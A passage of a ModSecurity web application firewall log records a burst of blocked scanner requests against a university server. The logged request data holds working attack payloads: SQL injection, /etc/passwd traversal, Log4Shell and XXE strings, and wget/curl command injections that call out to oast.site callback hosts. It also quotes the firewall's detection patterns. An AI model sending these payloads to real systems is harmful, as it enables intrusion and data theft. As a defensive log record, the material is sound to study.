"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQSWMUAAAA0"]
[Tue Aug 29 11:31:30.370901 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQDFUAAAAAl"]
[Tue Aug 29 11:31:31.360481 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgc797er5dsi4m7.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAP6NOUAAAAQ"]
[Tue Aug 29 11:31:32.401753 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQJWtcAAAAr"]
[Tue Aug 29 11:31:33.424369 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAPah0IAAAAL"]
[Tue Aug 29 11:31:33.506574 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgpk8oyxzopdza3.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQKOcMAAAAs"]
[Tue Aug 29 11:31:34.509599 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAP@M0EAAAAZ"]
[Tue Aug 29 11:31:35.400435 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQJWuwAAAAr"]
[Tue Aug 29 11:31:36.320677 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgmtgafjopnjsea.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQJWu8AAAAr"]
[Tue Aug 29 11:31:37.379720 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qcCo-f0AAAQkBWgAAAAC"]
[Tue Aug 29 11:31:37.400963 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQkBWkAAAAC"]
[Tue Aug 29 11:31:37.425448 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQlGRIAAAAF"]
[Tue Aug 29 11:31:38.323484 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgxdznmjthd68r8.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAN@5HkAAAAO"]
[Tue Aug 29 11:31:38.399597 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQlGRcAAAAF"]
[Tue Aug 29 11:31:38.668111 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlggb3nwwazbbh6b.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQSWM0AAAA0"]
[Tue Aug 29 11:31:39.374903 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgzn7fk6kenppp1.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAP5mJgAAAAM"]
[Tue Aug 29 11:31:40.393633 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQA-@IAAAAi"]
[Tue Aug 29 11:31:41.608157 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAN@5IQAAAAO"]
[Tue Aug 29 11:31:43.373031 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQMrvIAAAAu"]
[Tue Aug 29 11:31:44.321188 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQOv3YAAAAw"]
[Tue Aug 29 11:31:44.321443 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfeb.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQV4O0AAAA3"]
[Tue Aug 29 11:31:44.321519 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQV4O0AAAA3"]
[Tue Aug 29 11:31:44.360905 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQOv3cAAAAw"]
[Tue Aug 29 11:31:44.382846 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAANsAUwAAAAD"]
[Tue Aug 29 11:31:45.422669 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQR464AAAAz"]
[Tue Aug 29 11:31:45.466804 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgdo6hb581883je.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQSWOIAAAA0"]
[Tue Aug 29 11:31:46.391487 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQMrvsAAAAu"]
[Tue Aug 29 11:31:47.426391 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQMrv0AAAAu"]
[Tue Aug 29 11:31:47.448229 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAANWgVYAAAAG"]
[Tue Aug 29 11:31:49.309008 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQnF4gAAAAF"]
[Tue Aug 29 11:31:49.376659 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQR470AAAAz"]
